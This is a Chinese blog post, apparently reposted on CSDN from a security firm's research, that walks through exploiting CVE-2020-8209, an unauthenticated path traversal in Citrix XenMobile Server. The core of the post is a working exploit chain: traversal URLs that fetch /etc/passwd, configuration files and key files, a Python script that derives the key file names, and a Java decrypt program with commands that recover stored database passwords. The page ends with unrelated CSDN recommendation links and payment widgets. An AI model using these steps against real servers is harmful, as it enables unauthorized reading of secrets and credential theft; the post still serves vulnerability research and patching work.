java遍历目录下所有文件_XenMobile目录遍历任意文件读取(CVE-2020-8209)

最新推荐文章于 2024-06-04 15:24:35 发布
最新推荐文章于 2024-06-04 15:24:35 发布
阅读量115 收藏
点赞数
文章标签: java遍历目录下所有文件 jmeter读取遍历csv文件 如何读取json文件并遍历

52d324b497df84405a89b6d6bba32841.png

利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。不需要授权。

2b283a7161e17f1864606ca0659ae174.png

POC(路径遍历)

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

6e9df8ad59331b835b58867ab666969b.png

解密配置密码 读取配置

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

4609dcfc344f321f37e2f711eb07ece4.png

密码已加密并以以下两种格式之一存储:{aes} [base64文本]或{aes} {db} [base64文本]。加密由库/opt/sas/sw/lib/libsecure.so和DataSecurity.jar处理。为了解密,需要相应的密钥。 它们位于文件/opt/sas/rt/keys/security.properties,可以使用路径遍历漏洞进行下载。

3ae95c970509d3631a2772077ec591ef.png

使用算法对每个参数P.TXT1,P.TXT2,P.TXT3进行哈希处理

d564ec8ea79d9eca40bed8e40d248653.png

test.py

from base64 import b64encode
from hashlib import sha256
print(b64encode(sha256(b'xxsbovqwtroclyjdrmgk').digest()).decode('ascii').translate({47:None,61:None}))
print(b64encode(sha256(b'zxxwzveilgqsxhphdveh').digest()).decode('ascii').translate({47:None,61:None}))
print(b64encode(sha256(b'pxicutcshrkhkyxpyvdg').digest()).decode('ascii').translate({47:None,61:None}))

158b630c39664a8cf2eabc304b1369ac.png

生成三个文件dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt +KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt,通过遍历下载下来。 坑点:"+"号转义为%2b

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt

c7f6ef9e1f7d3776a4a6e419f9c43dab.png 
/jsp/help-sb-download.jsp?
sbFileName=../../../opt/sas/rt/keys/+KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt

011d5213bd2697ff7d94f5b1869529a5.png 
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt

57c4e9ba8a251e5e5c7931448df9fe5d.png

/opt/sas/sw/lib/libsecure.so需要用于加密的库。

ba0f3962d2729330b0972c631bcb1865.png

当务之急是这些文件(security.properties,dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt +KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt,libsecure.so),以保存到本地。 坑点:以上5个文件必须放在对应web目录,并且opt在根目录。

4e8cab13905b80fff4487fee3f739f4b.png

还需要三个Java库,保存到一个文件夹:/opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/DataSecurity.jar,/opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/common-interfaces.jar,/opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/slf4j-api-1.6.4.jar。 在文件夹中,创建一个decrypt.class包含以下内容的文件并进行编译。 javac -cp DataSecurity.jar decrypt.java 

import com.citrix.xms.security.DataSecurity;

class decrypt {
    public static void main(String[] args) {
        if (args.length < 1) {
            System.out.println("Usage:n    decrypt [encrypted string]");
            return;
        }
        System.out.println(DataSecurity.decryptDbPassword(args[0]));
    }
}

b114dca91eb9b677aa90f59210ce3693.png

通过正确排列所有数据,我们可以从配置文件中解密密码。

java -cp ./DataSecurity.jar:./common-interfaces.jar:./slf4j-api-1.6.4.jar:. decrypt {aes}{db}trsPTT4DkG9nMqXpv1Mi8H8nTQBMqqINy+G4VcMgyyE= 2>/dev/null

6ce396be98b8169cb73504d8b2953f28.png

web控制台默认用户Administrator

引用文章 https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/

weixin_39855634
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
旁站渗透实验
qq_42801460的博客
03-30 170
任意文件下载),RP2之前的Citrix XenMobile Server 10.12,RP4之前的Citrix XenMobile Server 10.11,RP6之前的Citrix XenMobile Server 10.10和Citrix XenMobile Server 10.9 RP5之前的。“.asp --> /xx.asp/xx.jpg//.asp,.asa目录下的文件都解析成asp文件.asp --> xx.asp;现在很多企业都有自己的微信公众号,因此,公众号也是渗透的突破口。
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
Apache Flink目录遍历(CVE-2020-17519)批量检测工具 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 ...
目录遍历漏洞_Citrix XenMobile目录遍历漏洞复现分析(CVE20208209
weixin_39788051的博客
12-16 433
01—漏洞背景XenMobile:Citrix Endpoint Management(也称为XenMobile)用于管理员工的移动设备和移动应用程序。通常,由于Active Directory集成,它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。02—漏洞复现2.1 复现环境使用环境:本地搭建的环境复现版本:无2.2 环境搭建无2.3 利用条件无2...
Java】 如何使用Java读取文件夹中的所有文件
最新发布
baidu_23445983的博客
06-04 523
选择哪种方法取决于具体的应用场景和个人偏好。对于初学者来说,理解文件系统的结构和API的使用是至关重要的。随着经验的积累,可以更灵活地处理更复杂的文件I/O任务。在Java中,读取文件夹中的所有文件通常涉及到文件I/O操作,这是Java提供的一种操作文件目录的方法。对于初学者来说,理解文件系统的结构和如何使用这些API是至关重要的。> (3)数据可视化分析QQ、微信聊天记录,提取某一天的聊天记录与大模型对话。> (2)内含QQ、微信聊天记录保存到本地的方法,真正实现自己数据自己管理。
Java文件遍历文件内容读取
m0_46103880的博客
05-20 2393
Java文件遍历和通过字节流读书文件内容
24.java- File类的常用方法:遍历目录里的文件
其木王·王子的博客
11-25 4367
File类的常用方法:遍历目录里的文件
文件IO】遍历指定目录下的所有文件
challenglistic的博客
11-24 5298
Linux中遍历指定目录下的所有文件
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 ...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
java文件文件夹的操作,比如读取文件里面东西,遍历文件夹下的文件等操作
一天不写代码难受的博客
08-15 1954
操作文件的工具类
java遍历本地目录所有文件
weixin_42610010的博客
12-28 1814
使用 Java 遍历本地目录中的所有文件,您可以使用 java.io.File 类。 首先,您需要创建一个 File 对象,并指定要遍历目录的路径。然后,您可以使用 listFiles() 方法获取该目录中的所有文件。您可以使用 isDirectory() 方法判断文件是否是目录,如果是目录,则可以使用递归的方式遍历目录中的所有文件。 下面是一个示例代码,该代码使用递归的方式遍历本地目录中的所...
python中,遍历目录及子目录,并抓取特定文件
简介不重要
07-02 2954
一、使用listdir(dir) 思路:os模块的listdir(dir)方法可以获取当前目录下所有的目录文件。由此可以进行目录遍历,并用递归的方法进行深度遍历。(代码只做了最简单的完成,如果需要保持程序的健壮性,请自行添加…) SA: def get_files(dir, suffix): """ :param dir: 进行深度遍历目录 :param suffi...
遍历读取文件夹下的所有文件
qq_44722108的博客
03-03 1143
遍历读取文件夹下的所有文件
Java 中,如何批量读取本项目资源目录下的所有文件
暗诺星刻的博客
03-07 6041
Java 中,如何批量读取本项目资源目录下的所有文件读取资源目录下的指定文件方法 1:使用 JDK 中原始 API方法 2:借助 Spring附录将 InputStream 转化为 byte 数组将 File 转化为 byte 数组将 byte 数组转化为 InputStream   今天笔者遇到一个需求,如何读取本项目资源目录下的所有文件读取资源目录下的指定的文件很容易,这只需要给出路径即可。 读取资源目录下的指定文件 /** * 方法 getResourceAsStream 的路径是以资源目录
Java入门】使用Java实现文件夹的遍历
yubao0723的专栏
01-11 1万+
Java实现遍历文件夹下的所有文件(递归调用和非递归调用)
Python遍历目录下的所有文件读取、千万条数据合并详解
你隔壁的小王的博客
01-07 8330
使用Python进行递归文件文件夹的判断 使用Python完整的获取所有文件文件夹并读取相应的文件 使用Python合并数据 总共1000多万条数据,如果我们用Excel的话估计要很多时间将这么多表格合并,而且会很卡,最后总结,python NP! 不足之处还请大家多多指正!
java获取文件夹下所有的文件
热门推荐
qq_46258463的博客
09-06 5万+
java获取文件夹下所有的文件文件名,递归
详细介绍一下tomcat的目录遍历漏洞(CVE-2020-1938)
04-29
Tomcat 目录遍历漏洞(CVE-2020-1938)是一种文件包含漏洞,影响 Apache Tomcat 服务器的 AJP 协议。 AJP 协议(Apache JServ Protocol)是 Apache HTTP Server 与 Tomcat 之间通信的一种协议,可以通过 mod_jk、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值